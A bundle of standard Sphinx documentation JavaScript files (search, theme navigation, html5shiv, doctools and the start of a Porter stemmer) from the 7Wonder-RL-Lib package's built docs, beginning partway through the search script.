"Your search did not match any documents. Please make sure that all words are spelled correctly and that you've selected enough categories."
);
else
Search.status.innerText = _(
`Search finished, found ${resultCount} page(s) matching the search query.`
);
};
const _displayNextItem = (
results,
resultCount,
searchTerms
) => {
// results left, load the summary and display it
  // this is intended to be dynamic (resultCount is deliberately left unchanged)
if (results.length) {
_displayItem(results.pop(), searchTerms);
setTimeout(
() => _displayNextItem(results, resultCount, searchTerms),
5
);
}
// search finished, update title and status message
else _finishSearch(resultCount);
};
/**
* Default splitQuery function. Can be overridden in ``sphinx.search`` with a
* custom function per language.
*
* The regular expression works by splitting the string on consecutive characters
* that are not Unicode letters, numbers, underscores, or emoji characters.
* This is the same as ``\W+`` in Python, preserving the surrogate pair area.
*/
if (typeof splitQuery === "undefined") {
var splitQuery = (query) => query
.split(/[^\p{Letter}\p{Number}_\p{Emoji_Presentation}]+/gu)
.filter(term => term) // remove remaining empty strings
}
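// Example (illustrative):
//   splitQuery("foo.bar_baz 42") -> ["foo", "bar_baz", "42"]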
/**
* Search Module
*/
const Search = {
_index: null,
_queued_query: null,
_pulse_status: -1,
htmlToText: (htmlString) => {
const htmlElement = new DOMParser().parseFromString(htmlString, 'text/html');
htmlElement.querySelectorAll(".headerlink").forEach((el) => { el.remove() });
const docContent = htmlElement.querySelector('[role="main"]');
    if (docContent) return docContent.textContent;
    console.warn(
      "Content block not found. Sphinx search tries to obtain it via '[role=main]'. Please check your theme or template."
);
return "";
},
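  // Illustrative example (hypothetical markup, not part of the original file):
  //   Search.htmlToText('<div role="main">API<a class="headerlink">¶</a></div>')
  //   // -> "API": headerlinks are stripped and only the main block is kept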
init: () => {
const query = new URLSearchParams(window.location.search).get("q");
document
.querySelectorAll('input[name="q"]')
.forEach((el) => (el.value = query));
if (query) Search.performSearch(query);
},
loadIndex: (url) =>
(document.body.appendChild(document.createElement("script")).src = url),
setIndex: (index) => {
Search._index = index;
if (Search._queued_query !== null) {
const query = Search._queued_query;
Search._queued_query = null;
Search.query(query);
}
},
hasIndex: () => Search._index !== null,
deferQuery: (query) => (Search._queued_query = query),
stopPulse: () => (Search._pulse_status = -1),
startPulse: () => {
if (Search._pulse_status >= 0) return;
const pulse = () => {
Search._pulse_status = (Search._pulse_status + 1) % 4;
Search.dots.innerText = ".".repeat(Search._pulse_status);
if (Search._pulse_status >= 0) window.setTimeout(pulse, 500);
};
pulse();
},
/**
* perform a search for something (or wait until index is loaded)
*/
performSearch: (query) => {
// create the required interface elements
const searchText = document.createElement("h2");
searchText.textContent = _("Searching");
const searchSummary = document.createElement("p");
searchSummary.classList.add("search-summary");
searchSummary.innerText = "";
const searchList = document.createElement("ul");
searchList.classList.add("search");
const out = document.getElementById("search-results");
Search.title = out.appendChild(searchText);
Search.dots = Search.title.appendChild(document.createElement("span"));
Search.status = out.appendChild(searchSummary);
Search.output = out.appendChild(searchList);
const searchProgress = document.getElementById("search-progress");
// Some themes don't use the search progress node
if (searchProgress) {
searchProgress.innerText = _("Preparing search...");
}
Search.startPulse();
// index already loaded, the browser was quick!
if (Search.hasIndex()) Search.query(query);
else Search.deferQuery(query);
},
/**
* execute search (requires search index to be loaded)
*/
query: (query) => {
const filenames = Search._index.filenames;
const docNames = Search._index.docnames;
const titles = Search._index.titles;
const allTitles = Search._index.alltitles;
const indexEntries = Search._index.indexentries;
// stem the search terms and add them to the correct list
const stemmer = new Stemmer();
const searchTerms = new Set();
const excludedTerms = new Set();
const highlightTerms = new Set();
const objectTerms = new Set(splitQuery(query.toLowerCase().trim()));
splitQuery(query.trim()).forEach((queryTerm) => {
const queryTermLower = queryTerm.toLowerCase();
// maybe skip this "word"
// stopwords array is from language_data.js
if (
stopwords.indexOf(queryTermLower) !== -1 ||
queryTerm.match(/^\d+$/)
)
return;
// stem the word
let word = stemmer.stemWord(queryTermLower);
// select the correct list
if (word[0] === "-") excludedTerms.add(word.substr(1));
else {
searchTerms.add(word);
highlightTerms.add(queryTermLower);
}
});
if (SPHINX_HIGHLIGHT_ENABLED) { // set in sphinx_highlight.js
localStorage.setItem("sphinx_highlight_terms", [...highlightTerms].join(" "))
}
// console.debug("SEARCH: searching for:");
// console.info("required: ", [...searchTerms]);
// console.info("excluded: ", [...excludedTerms]);
// array of [docname, title, anchor, descr, score, filename]
let results = [];
_removeChildren(document.getElementById("search-progress"));
const queryLower = query.toLowerCase();
for (const [title, foundTitles] of Object.entries(allTitles)) {
if (title.toLowerCase().includes(queryLower) && (queryLower.length >= title.length/2)) {
for (const [file, id] of foundTitles) {
          let score = Math.round(100 * queryLower.length / title.length);
results.push([
docNames[file],
titles[file] !== title ? `${titles[file]} > ${title}` : title,
id !== null ? "#" + id : "",
null,
score,
filenames[file],
]);
}
}
}
// search for explicit entries in index directives
for (const [entry, foundEntries] of Object.entries(indexEntries)) {
if (entry.includes(queryLower) && (queryLower.length >= entry.length/2)) {
for (const [file, id] of foundEntries) {
          let score = Math.round(100 * queryLower.length / entry.length);
results.push([
docNames[file],
titles[file],
id ? "#" + id : "",
null,
score,
filenames[file],
]);
}
}
}
// lookup as object
objectTerms.forEach((term) =>
results.push(...Search.performObjectSearch(term, objectTerms))
);
// lookup as search terms in fulltext
results.push(...Search.performTermsSearch(searchTerms, excludedTerms));
// let the scorer override scores with a custom scoring function
if (Scorer.score) results.forEach((item) => (item[4] = Scorer.score(item)));
// now sort the results by score (in opposite order of appearance, since the
// display function below uses pop() to retrieve items) and then
// alphabetically
results.sort((a, b) => {
const leftScore = a[4];
const rightScore = b[4];
if (leftScore === rightScore) {
// same score: sort alphabetically
const leftTitle = a[1].toLowerCase();
const rightTitle = b[1].toLowerCase();
if (leftTitle === rightTitle) return 0;
return leftTitle > rightTitle ? -1 : 1; // inverted is intentional
}
return leftScore > rightScore ? 1 : -1;
});
// remove duplicate search results
// note the reversing of results, so that in the case of duplicates, the highest-scoring entry is kept
let seen = new Set();
results = results.reverse().reduce((acc, result) => {
let resultStr = result.slice(0, 4).concat([result[5]]).map(v => String(v)).join(',');
if (!seen.has(resultStr)) {
acc.push(result);
seen.add(resultStr);
}
return acc;
}, []);
results = results.reverse();
// for debugging
//Search.lastresults = results.slice(); // a copy
// console.info("search results:", Search.lastresults);
// print the results
_displayNextItem(results, results.length, searchTerms);
},
/**
* search for object names
*/
performObjectSearch: (object, objectTerms) => {
const filenames = Search._index.filenames;
const docNames = Search._index.docnames;
const objects = Search._index.objects;
const objNames = Search._index.objnames;
const titles = Search._index.titles;
const results = [];
const objectSearchCallback = (prefix, match) => {
const name = match[4]
const fullname = (prefix ? prefix + "." : "") + name;
const fullnameLower = fullname.toLowerCase();
if (fullnameLower.indexOf(object) < 0) return;
let score = 0;
const parts = fullnameLower.split(".");
// check for different match types: exact matches of full name or
// "last name" (i.e. last dotted part)
if (fullnameLower === object || parts.slice(-1)[0] === object)
score += Scorer.objNameMatch;
else if (parts.slice(-1)[0].indexOf(object) > -1)
score += Scorer.objPartialMatch; // matches in last name
const objName = objNames[match[1]][2];
const title = titles[match[0]];
// If more than one term searched for, we require other words to be
// found in the name/title/description
const otherTerms = new Set(objectTerms);
otherTerms.delete(object);
if (otherTerms.size > 0) {
const haystack = `${prefix} ${name} ${objName} ${title}`.toLowerCase();
if (
[...otherTerms].some((otherTerm) => haystack.indexOf(otherTerm) < 0)
)
return;
}
let anchor = match[3];
if (anchor === "") anchor = fullname;
else if (anchor === "-") anchor = objNames[match[1]][1] + "-" + fullname;
const descr = objName + _(", in ") + title;
// add custom score for some objects according to scorer
if (Scorer.objPrio.hasOwnProperty(match[2]))
score += Scorer.objPrio[match[2]];
else score += Scorer.objPrioDefault;
results.push([
docNames[match[0]],
fullname,
"#" + anchor,
descr,
score,
filenames[match[0]],
]);
};
Object.keys(objects).forEach((prefix) =>
objects[prefix].forEach((array) =>
objectSearchCallback(prefix, array)
)
);
return results;
},
/**
* search for full-text terms in the index
*/
performTermsSearch: (searchTerms, excludedTerms) => {
// prepare search
const terms = Search._index.terms;
const titleTerms = Search._index.titleterms;
const filenames = Search._index.filenames;
const docNames = Search._index.docnames;
const titles = Search._index.titles;
const scoreMap = new Map();
const fileMap = new Map();
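    // scoreMap: file -> { word: score }; fileMap: file -> [words found in file]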
// perform the search on the required terms
searchTerms.forEach((word) => {
const files = [];
const arr = [
{ files: terms[word], score: Scorer.term },
{ files: titleTerms[word], score: Scorer.title },
];
// add support for partial matches
if (word.length > 2) {
const escapedWord = _escapeRegExp(word);
Object.keys(terms).forEach((term) => {
if (term.match(escapedWord) && !terms[word])
arr.push({ files: terms[term], score: Scorer.partialTerm });
});
Object.keys(titleTerms).forEach((term) => {
if (term.match(escapedWord) && !titleTerms[word])
            arr.push({ files: titleTerms[term], score: Scorer.partialTitle });
});
}
// no match but word was a required one
if (arr.every((record) => record.files === undefined)) return;
// found search word in contents
arr.forEach((record) => {
if (record.files === undefined) return;
let recordFiles = record.files;
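        // the index stores a bare file id when a word occurs in only one file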
if (recordFiles.length === undefined) recordFiles = [recordFiles];
files.push(...recordFiles);
// set score for the word in each file
recordFiles.forEach((file) => {
if (!scoreMap.has(file)) scoreMap.set(file, {});
scoreMap.get(file)[word] = record.score;
});
});
// create the mapping
files.forEach((file) => {
if (fileMap.has(file) && fileMap.get(file).indexOf(word) === -1)
fileMap.get(file).push(word);
else fileMap.set(file, [word]);
});
});
// now check if the files don't contain excluded terms
const results = [];
for (const [file, wordList] of fileMap) {
// check if all requirements are matched
// as search terms with length < 3 are discarded
const filteredTermCount = [...searchTerms].filter(
(term) => term.length > 2
).length;
if (
wordList.length !== searchTerms.size &&
wordList.length !== filteredTermCount
)
continue;
// ensure that none of the excluded terms is in the search result
if (
[...excludedTerms].some(
(term) =>
terms[term] === file ||
titleTerms[term] === file ||
(terms[term] || []).includes(file) ||
(titleTerms[term] || []).includes(file)
)
)
        continue;
// select one (max) score for the file.
const score = Math.max(...wordList.map((w) => scoreMap.get(file)[w]));
// add result to the result list
results.push([
docNames[file],
titles[file],
"",
null,
score,
filenames[file],
]);
}
return results;
},
/**
* helper function to return a node containing the
* search summary for a given text. keywords is a list
* of stemmed words.
*/
makeSearchSummary: (htmlText, keywords) => {
const text = Search.htmlToText(htmlText);
if (text === "") return null;
const textLower = text.toLowerCase();
const actualStartPosition = [...keywords]
.map((k) => textLower.indexOf(k.toLowerCase()))
.filter((i) => i > -1)
.slice(-1)[0];
const startWithContext = Math.max(actualStartPosition - 120, 0);
const top = startWithContext === 0 ? "" : "...";
const tail = startWithContext + 240 < text.length ? "..." : "";
let summary = document.createElement("p");
summary.classList.add("context");
summary.textContent = top + text.substr(startWithContext, 240).trim() + tail;
return summary;
},
};
_ready(Search.init); | 7Wonder-RL-Lib | /7Wonder-RL-Lib-0.1.1.tar.gz/7Wonder-RL-Lib-0.1.1/docs/_build/html/_static/searchtools.js | searchtools.js |
!function(n){var e={};function t(i){if(e[i])return e[i].exports;var o=e[i]={i:i,l:!1,exports:{}};return n[i].call(o.exports,o,o.exports,t),o.l=!0,o.exports}t.m=n,t.c=e,t.d=function(n,e,i){t.o(n,e)||Object.defineProperty(n,e,{enumerable:!0,get:i})},t.r=function(n){"undefined"!=typeof Symbol&&Symbol.toStringTag&&Object.defineProperty(n,Symbol.toStringTag,{value:"Module"}),Object.defineProperty(n,"__esModule",{value:!0})},t.t=function(n,e){if(1&e&&(n=t(n)),8&e)return n;if(4&e&&"object"==typeof n&&n&&n.__esModule)return n;var i=Object.create(null);if(t.r(i),Object.defineProperty(i,"default",{enumerable:!0,value:n}),2&e&&"string"!=typeof n)for(var o in n)t.d(i,o,function(e){return n[e]}.bind(null,o));return i},t.n=function(n){var e=n&&n.__esModule?function(){return n.default}:function(){return n};return t.d(e,"a",e),e},t.o=function(n,e){return Object.prototype.hasOwnProperty.call(n,e)},t.p="",t(t.s=0)}([function(n,e,t){t(1),n.exports=t(3)},function(n,e,t){(function(){var e="undefined"!=typeof window?window.jQuery:t(2);n.exports.ThemeNav={navBar:null,win:null,winScroll:!1,winResize:!1,linkScroll:!1,winPosition:0,winHeight:null,docHeight:null,isRunning:!1,enable:function(n){var t=this;void 0===n&&(n=!0),t.isRunning||(t.isRunning=!0,e((function(e){t.init(e),t.reset(),t.win.on("hashchange",t.reset),n&&t.win.on("scroll",(function(){t.linkScroll||t.winScroll||(t.winScroll=!0,requestAnimationFrame((function(){t.onScroll()})))})),t.win.on("resize",(function(){t.winResize||(t.winResize=!0,requestAnimationFrame((function(){t.onResize()})))})),t.onResize()})))},enableSticky:function(){this.enable(!0)},init:function(n){n(document);var e=this;this.navBar=n("div.wy-side-scroll:first"),this.win=n(window),n(document).on("click","[data-toggle='wy-nav-top']",(function(){n("[data-toggle='wy-nav-shift']").toggleClass("shift"),n("[data-toggle='rst-versions']").toggleClass("shift")})).on("click",".wy-menu-vertical .current ul li a",(function(){var t=n(this);n("[data-toggle='wy-nav-shift']").removeClass("shift"),n("[data-toggle='rst-versions']").toggleClass("shift"),e.toggleCurrent(t),e.hashChange()})).on("click","[data-toggle='rst-current-version']",(function(){n("[data-toggle='rst-versions']").toggleClass("shift-up")})),n("table.docutils:not(.field-list,.footnote,.citation)").wrap("<div class='wy-table-responsive'></div>"),n("table.docutils.footnote").wrap("<div class='wy-table-responsive footnote'></div>"),n("table.docutils.citation").wrap("<div class='wy-table-responsive citation'></div>"),n(".wy-menu-vertical ul").not(".simple").siblings("a").each((function(){var t=n(this);expand=n('<button class="toctree-expand" title="Open/close menu"></button>'),expand.on("click",(function(n){return e.toggleCurrent(t),n.stopPropagation(),!1})),t.prepend(expand)}))},reset:function(){var n=encodeURI(window.location.hash)||"#";try{var e=$(".wy-menu-vertical"),t=e.find('[href="'+n+'"]');if(0===t.length){var i=$('.document [id="'+n.substring(1)+'"]').closest("div.section");0===(t=e.find('[href="#'+i.attr("id")+'"]')).length&&(t=e.find('[href="#"]'))}if(t.length>0){$(".wy-menu-vertical .current").removeClass("current").attr("aria-expanded","false"),t.addClass("current").attr("aria-expanded","true"),t.closest("li.toctree-l1").parent().addClass("current").attr("aria-expanded","true");for(let n=1;n<=10;n++)t.closest("li.toctree-l"+n).addClass("current").attr("aria-expanded","true");t[0].scrollIntoView()}}catch(n){console.log("Error expanding nav for anchor",n)}},onScroll:function(){this.winScroll=!1;var 
n=this.win.scrollTop(),e=n+this.winHeight,t=this.navBar.scrollTop()+(n-this.winPosition);n<0||e>this.docHeight||(this.navBar.scrollTop(t),this.winPosition=n)},onResize:function(){this.winResize=!1,this.winHeight=this.win.height(),this.docHeight=$(document).height()},hashChange:function(){this.linkScroll=!0,this.win.one("hashchange",(function(){this.linkScroll=!1}))},toggleCurrent:function(n){var e=n.closest("li");e.siblings("li.current").removeClass("current").attr("aria-expanded","false"),e.siblings().find("li.current").removeClass("current").attr("aria-expanded","false");var t=e.find("> ul li");t.length&&(t.removeClass("current").attr("aria-expanded","false"),e.toggleClass("current").attr("aria-expanded",(function(n,e){return"true"==e?"false":"true"})))}},"undefined"!=typeof window&&(window.SphinxRtdTheme={Navigation:n.exports.ThemeNav,StickyNav:n.exports.ThemeNav}),function(){for(var n=0,e=["ms","moz","webkit","o"],t=0;t<e.length&&!window.requestAnimationFrame;++t)window.requestAnimationFrame=window[e[t]+"RequestAnimationFrame"],window.cancelAnimationFrame=window[e[t]+"CancelAnimationFrame"]||window[e[t]+"CancelRequestAnimationFrame"];window.requestAnimationFrame||(window.requestAnimationFrame=function(e,t){var i=(new Date).getTime(),o=Math.max(0,16-(i-n)),r=window.setTimeout((function(){e(i+o)}),o);return n=i+o,r}),window.cancelAnimationFrame||(window.cancelAnimationFrame=function(n){clearTimeout(n)})}()}).call(window)},function(n,e){n.exports=jQuery},function(n,e,t){}]); | 7Wonder-RL-Lib | /7Wonder-RL-Lib-0.1.1.tar.gz/7Wonder-RL-Lib-0.1.1/docs/_build/html/_static/js/theme.js | theme.js |
!function(a,b){function c(a,b){var c=a.createElement("p"),d=a.getElementsByTagName("head")[0]||a.documentElement;return c.innerHTML="x<style>"+b+"</style>",d.insertBefore(c.lastChild,d.firstChild)}function d(){var a=y.elements;return"string"==typeof a?a.split(" "):a}function e(a,b){var c=y.elements;"string"!=typeof c&&(c=c.join(" ")),"string"!=typeof a&&(a=a.join(" ")),y.elements=c+" "+a,j(b)}function f(a){var b=x[a[v]];return b||(b={},w++,a[v]=w,x[w]=b),b}function g(a,c,d){if(c||(c=b),q)return c.createElement(a);d||(d=f(c));var e;return e=d.cache[a]?d.cache[a].cloneNode():u.test(a)?(d.cache[a]=d.createElem(a)).cloneNode():d.createElem(a),!e.canHaveChildren||t.test(a)||e.tagUrn?e:d.frag.appendChild(e)}function h(a,c){if(a||(a=b),q)return a.createDocumentFragment();c=c||f(a);for(var e=c.frag.cloneNode(),g=0,h=d(),i=h.length;i>g;g++)e.createElement(h[g]);return e}function i(a,b){b.cache||(b.cache={},b.createElem=a.createElement,b.createFrag=a.createDocumentFragment,b.frag=b.createFrag()),a.createElement=function(c){return y.shivMethods?g(c,a,b):b.createElem(c)},a.createDocumentFragment=Function("h,f","return function(){var n=f.cloneNode(),c=n.createElement;h.shivMethods&&("+d().join().replace(/[\w\-:]+/g,function(a){return b.createElem(a),b.frag.createElement(a),'c("'+a+'")'})+");return n}")(y,b.frag)}function j(a){a||(a=b);var d=f(a);return!y.shivCSS||p||d.hasCSS||(d.hasCSS=!!c(a,"article,aside,dialog,figcaption,figure,footer,header,hgroup,main,nav,section{display:block}mark{background:#FF0;color:#000}template{display:none}")),q||i(a,d),a}function k(a){for(var b,c=a.getElementsByTagName("*"),e=c.length,f=RegExp("^(?:"+d().join("|")+")$","i"),g=[];e--;)b=c[e],f.test(b.nodeName)&&g.push(b.applyElement(l(b)));return g}function l(a){for(var b,c=a.attributes,d=c.length,e=a.ownerDocument.createElement(A+":"+a.nodeName);d--;)b=c[d],b.specified&&e.setAttribute(b.nodeName,b.nodeValue);return e.style.cssText=a.style.cssText,e}function m(a){for(var b,c=a.split("{"),e=c.length,f=RegExp("(^|[\\s,>+~])("+d().join("|")+")(?=[[\\s,>+~#.:]|$)","gi"),g="$1"+A+"\\:$2";e--;)b=c[e]=c[e].split("}"),b[b.length-1]=b[b.length-1].replace(f,g),c[e]=b.join("}");return c.join("{")}function n(a){for(var b=a.length;b--;)a[b].removeNode()}function o(a){function b(){clearTimeout(g._removeSheetTimer),d&&d.removeNode(!0),d=null}var d,e,g=f(a),h=a.namespaces,i=a.parentWindow;return!B||a.printShived?a:("undefined"==typeof h[A]&&h.add(A),i.attachEvent("onbeforeprint",function(){b();for(var f,g,h,i=a.styleSheets,j=[],l=i.length,n=Array(l);l--;)n[l]=i[l];for(;h=n.pop();)if(!h.disabled&&z.test(h.media)){try{f=h.imports,g=f.length}catch(o){g=0}for(l=0;g>l;l++)n.push(f[l]);try{j.push(h.cssText)}catch(o){}}j=m(j.reverse().join("")),e=k(a),d=c(a,j)}),i.attachEvent("onafterprint",function(){n(e),clearTimeout(g._removeSheetTimer),g._removeSheetTimer=setTimeout(b,500)}),a.printShived=!0,a)}var p,q,r="3.7.3",s=a.html5||{},t=/^<|^(?:button|map|select|textarea|object|iframe|option|optgroup)$/i,u=/^(?:a|b|code|div|fieldset|h1|h2|h3|h4|h5|h6|i|label|li|ol|p|q|span|strong|style|table|tbody|td|th|tr|ul)$/i,v="_html5shiv",w=0,x={};!function(){try{var a=b.createElement("a");a.innerHTML="<xyz></xyz>",p="hidden"in a,q=1==a.childNodes.length||function(){b.createElement("a");var a=b.createDocumentFragment();return"undefined"==typeof a.cloneNode||"undefined"==typeof a.createDocumentFragment||"undefined"==typeof a.createElement}()}catch(c){p=!0,q=!0}}();var y={elements:s.elements||"abbr article aside audio bdi canvas data datalist details dialog 
figcaption figure footer header hgroup main mark meter nav output picture progress section summary template time video",version:r,shivCSS:s.shivCSS!==!1,supportsUnknownElements:q,shivMethods:s.shivMethods!==!1,type:"default",shivDocument:j,createElement:g,createDocumentFragment:h,addElements:e};a.html5=y,j(b);var z=/^$|\b(?:all|print)\b/,A="html5shiv",B=!q&&function(){var c=b.documentElement;return!("undefined"==typeof b.namespaces||"undefined"==typeof b.parentWindow||"undefined"==typeof c.applyElement||"undefined"==typeof c.removeNode||"undefined"==typeof a.attachEvent)}();y.type+=" print",y.shivPrint=o,o(b),"object"==typeof module&&module.exports&&(module.exports=y)}("undefined"!=typeof window?window:this,document); | 7Wonder-RL-Lib | /7Wonder-RL-Lib-0.1.1.tar.gz/7Wonder-RL-Lib-0.1.1/docs/_build/html/_static/js/html5shiv-printshiv.min.js | html5shiv-printshiv.min.js |
!function(a,b){function c(a,b){var c=a.createElement("p"),d=a.getElementsByTagName("head")[0]||a.documentElement;return c.innerHTML="x<style>"+b+"</style>",d.insertBefore(c.lastChild,d.firstChild)}function d(){var a=t.elements;return"string"==typeof a?a.split(" "):a}function e(a,b){var c=t.elements;"string"!=typeof c&&(c=c.join(" ")),"string"!=typeof a&&(a=a.join(" ")),t.elements=c+" "+a,j(b)}function f(a){var b=s[a[q]];return b||(b={},r++,a[q]=r,s[r]=b),b}function g(a,c,d){if(c||(c=b),l)return c.createElement(a);d||(d=f(c));var e;return e=d.cache[a]?d.cache[a].cloneNode():p.test(a)?(d.cache[a]=d.createElem(a)).cloneNode():d.createElem(a),!e.canHaveChildren||o.test(a)||e.tagUrn?e:d.frag.appendChild(e)}function h(a,c){if(a||(a=b),l)return a.createDocumentFragment();c=c||f(a);for(var e=c.frag.cloneNode(),g=0,h=d(),i=h.length;i>g;g++)e.createElement(h[g]);return e}function i(a,b){b.cache||(b.cache={},b.createElem=a.createElement,b.createFrag=a.createDocumentFragment,b.frag=b.createFrag()),a.createElement=function(c){return t.shivMethods?g(c,a,b):b.createElem(c)},a.createDocumentFragment=Function("h,f","return function(){var n=f.cloneNode(),c=n.createElement;h.shivMethods&&("+d().join().replace(/[\w\-:]+/g,function(a){return b.createElem(a),b.frag.createElement(a),'c("'+a+'")'})+");return n}")(t,b.frag)}function j(a){a||(a=b);var d=f(a);return!t.shivCSS||k||d.hasCSS||(d.hasCSS=!!c(a,"article,aside,dialog,figcaption,figure,footer,header,hgroup,main,nav,section{display:block}mark{background:#FF0;color:#000}template{display:none}")),l||i(a,d),a}var k,l,m="3.7.3-pre",n=a.html5||{},o=/^<|^(?:button|map|select|textarea|object|iframe|option|optgroup)$/i,p=/^(?:a|b|code|div|fieldset|h1|h2|h3|h4|h5|h6|i|label|li|ol|p|q|span|strong|style|table|tbody|td|th|tr|ul)$/i,q="_html5shiv",r=0,s={};!function(){try{var a=b.createElement("a");a.innerHTML="<xyz></xyz>",k="hidden"in a,l=1==a.childNodes.length||function(){b.createElement("a");var a=b.createDocumentFragment();return"undefined"==typeof a.cloneNode||"undefined"==typeof a.createDocumentFragment||"undefined"==typeof a.createElement}()}catch(c){k=!0,l=!0}}();var t={elements:n.elements||"abbr article aside audio bdi canvas data datalist details dialog figcaption figure footer header hgroup main mark meter nav output picture progress section summary template time video",version:m,shivCSS:n.shivCSS!==!1,supportsUnknownElements:l,shivMethods:n.shivMethods!==!1,type:"default",shivDocument:j,createElement:g,createDocumentFragment:h,addElements:e};a.html5=t,j(b),"object"==typeof module&&module.exports&&(module.exports=t)}("undefined"!=typeof window?window:this,document); | 7Wonder-RL-Lib | /7Wonder-RL-Lib-0.1.1.tar.gz/7Wonder-RL-Lib-0.1.1/docs/_build/html/_static/js/html5shiv.min.js | html5shiv.min.js |
"use strict";
const BLACKLISTED_KEY_CONTROL_ELEMENTS = new Set([
"TEXTAREA",
"INPUT",
"SELECT",
"BUTTON",
]);
const _ready = (callback) => {
if (document.readyState !== "loading") {
callback();
} else {
document.addEventListener("DOMContentLoaded", callback);
}
};
/**
* Small JavaScript module for the documentation.
*/
const Documentation = {
init: () => {
Documentation.initDomainIndexTable();
Documentation.initOnKeyListeners();
},
/**
* i18n support
*/
TRANSLATIONS: {},
PLURAL_EXPR: (n) => (n === 1 ? 0 : 1),
LOCALE: "unknown",
// gettext and ngettext don't access this so that the functions
// can safely bound to a different name (_ = Documentation.gettext)
gettext: (string) => {
const translated = Documentation.TRANSLATIONS[string];
switch (typeof translated) {
case "undefined":
return string; // no translation
case "string":
return translated; // translation exists
default:
return translated[0]; // (singular, plural) translation tuple exists
}
},
ngettext: (singular, plural, n) => {
const translated = Documentation.TRANSLATIONS[singular];
if (typeof translated !== "undefined")
return translated[Documentation.PLURAL_EXPR(n)];
return n === 1 ? singular : plural;
},
addTranslations: (catalog) => {
Object.assign(Documentation.TRANSLATIONS, catalog.messages);
Documentation.PLURAL_EXPR = new Function(
"n",
`return (${catalog.plural_expr})`
);
Documentation.LOCALE = catalog.locale;
},
/**
* helper function to focus on search bar
*/
focusSearchBar: () => {
document.querySelectorAll("input[name=q]")[0]?.focus();
},
/**
* Initialise the domain index toggle buttons
*/
initDomainIndexTable: () => {
const toggler = (el) => {
const idNumber = el.id.substr(7);
const toggledRows = document.querySelectorAll(`tr.cg-${idNumber}`);
if (el.src.substr(-9) === "minus.png") {
el.src = `${el.src.substr(0, el.src.length - 9)}plus.png`;
toggledRows.forEach((el) => (el.style.display = "none"));
} else {
el.src = `${el.src.substr(0, el.src.length - 8)}minus.png`;
toggledRows.forEach((el) => (el.style.display = ""));
}
};
const togglerElements = document.querySelectorAll("img.toggler");
togglerElements.forEach((el) =>
el.addEventListener("click", (event) => toggler(event.currentTarget))
);
togglerElements.forEach((el) => (el.style.display = ""));
if (DOCUMENTATION_OPTIONS.COLLAPSE_INDEX) togglerElements.forEach(toggler);
},
initOnKeyListeners: () => {
// only install a listener if it is really needed
if (
!DOCUMENTATION_OPTIONS.NAVIGATION_WITH_KEYS &&
!DOCUMENTATION_OPTIONS.ENABLE_SEARCH_SHORTCUTS
)
return;
document.addEventListener("keydown", (event) => {
// bail for input elements
if (BLACKLISTED_KEY_CONTROL_ELEMENTS.has(document.activeElement.tagName)) return;
// bail with special keys
if (event.altKey || event.ctrlKey || event.metaKey) return;
if (!event.shiftKey) {
switch (event.key) {
case "ArrowLeft":
if (!DOCUMENTATION_OPTIONS.NAVIGATION_WITH_KEYS) break;
const prevLink = document.querySelector('link[rel="prev"]');
if (prevLink && prevLink.href) {
window.location.href = prevLink.href;
event.preventDefault();
}
break;
case "ArrowRight":
if (!DOCUMENTATION_OPTIONS.NAVIGATION_WITH_KEYS) break;
const nextLink = document.querySelector('link[rel="next"]');
if (nextLink && nextLink.href) {
window.location.href = nextLink.href;
event.preventDefault();
}
break;
}
}
// some keyboard layouts may need Shift to get /
switch (event.key) {
case "/":
if (!DOCUMENTATION_OPTIONS.ENABLE_SEARCH_SHORTCUTS) break;
Documentation.focusSearchBar();
event.preventDefault();
}
});
},
};
// quick alias for translations
const _ = Documentation.gettext;
_ready(Documentation.init); | 7Wonder-RL-Lib | /7Wonder-RL-Lib-0.1.1.tar.gz/7Wonder-RL-Lib-0.1.1/docs/_static/doctools.js | doctools.js |
var stopwords = ["a", "and", "are", "as", "at", "be", "but", "by", "for", "if", "in", "into", "is", "it", "near", "no", "not", "of", "on", "or", "such", "that", "the", "their", "then", "there", "these", "they", "this", "to", "was", "will", "with"];
/* Non-minified version is copied as a separate JS file, is available */
/**
* Porter Stemmer
*/
var Stemmer = function() {
var step2list = {
ational: 'ate',
tional: 'tion',
enci: 'ence',
anci: 'ance',
izer: 'ize',
bli: 'ble',
alli: 'al',
entli: 'ent',
eli: 'e',
ousli: 'ous',
ization: 'ize',
ation: 'ate',
ator: 'ate',
alism: 'al',
iveness: 'ive',
fulness: 'ful',
ousness: 'ous',
aliti: 'al',
iviti: 'ive',
biliti: 'ble',
logi: 'log'
};
var step3list = {
icate: 'ic',
ative: '',
alize: 'al',
iciti: 'ic',
ical: 'ic',
ful: '',
ness: ''
};
var c = "[^aeiou]"; // consonant
var v = "[aeiouy]"; // vowel
var C = c + "[^aeiouy]*"; // consonant sequence
var V = v + "[aeiou]*"; // vowel sequence
var mgr0 = "^(" + C + ")?" + V + C; // [C]VC... is m>0
var meq1 = "^(" + C + ")?" + V + C + "(" + V + ")?$"; // [C]VC[V] is m=1
var mgr1 = "^(" + C + ")?" + V + C + V + C; // [C]VCVC... is m>1
var s_v = "^(" + C + ")?" + v; // vowel in stem
this.stemWord = function (w) {
var stem;
var suffix;
var firstch;
var origword = w;
if (w.length < 3)
return w;
var re;
var re2;
var re3;
var re4;
firstch = w.substr(0,1);
if (firstch == "y")
w = firstch.toUpperCase() + w.substr(1);
// Step 1a
re = /^(.+?)(ss|i)es$/;
re2 = /^(.+?)([^s])s$/;
if (re.test(w))
w = w.replace(re,"$1$2");
else if (re2.test(w))
w = w.replace(re2,"$1$2");
// Step 1b
re = /^(.+?)eed$/;
re2 = /^(.+?)(ed|ing)$/;
if (re.test(w)) {
var fp = re.exec(w);
re = new RegExp(mgr0);
if (re.test(fp[1])) {
re = /.$/;
w = w.replace(re,"");
}
}
else if (re2.test(w)) {
var fp = re2.exec(w);
stem = fp[1];
re2 = new RegExp(s_v);
if (re2.test(stem)) {
w = stem;
re2 = /(at|bl|iz)$/;
re3 = new RegExp("([^aeiouylsz])\\1$");
re4 = new RegExp("^" + C + v + "[^aeiouwxy]$");
if (re2.test(w))
w = w + "e";
else if (re3.test(w)) {
re = /.$/;
w = w.replace(re,"");
}
else if (re4.test(w))
w = w + "e";
}
}
// Step 1c
re = /^(.+?)y$/;
if (re.test(w)) {
var fp = re.exec(w);
stem = fp[1];
re = new RegExp(s_v);
if (re.test(stem))
w = stem + "i";
}
// Step 2
re = /^(.+?)(ational|tional|enci|anci|izer|bli|alli|entli|eli|ousli|ization|ation|ator|alism|iveness|fulness|ousness|aliti|iviti|biliti|logi)$/;
if (re.test(w)) {
var fp = re.exec(w);
stem = fp[1];
suffix = fp[2];
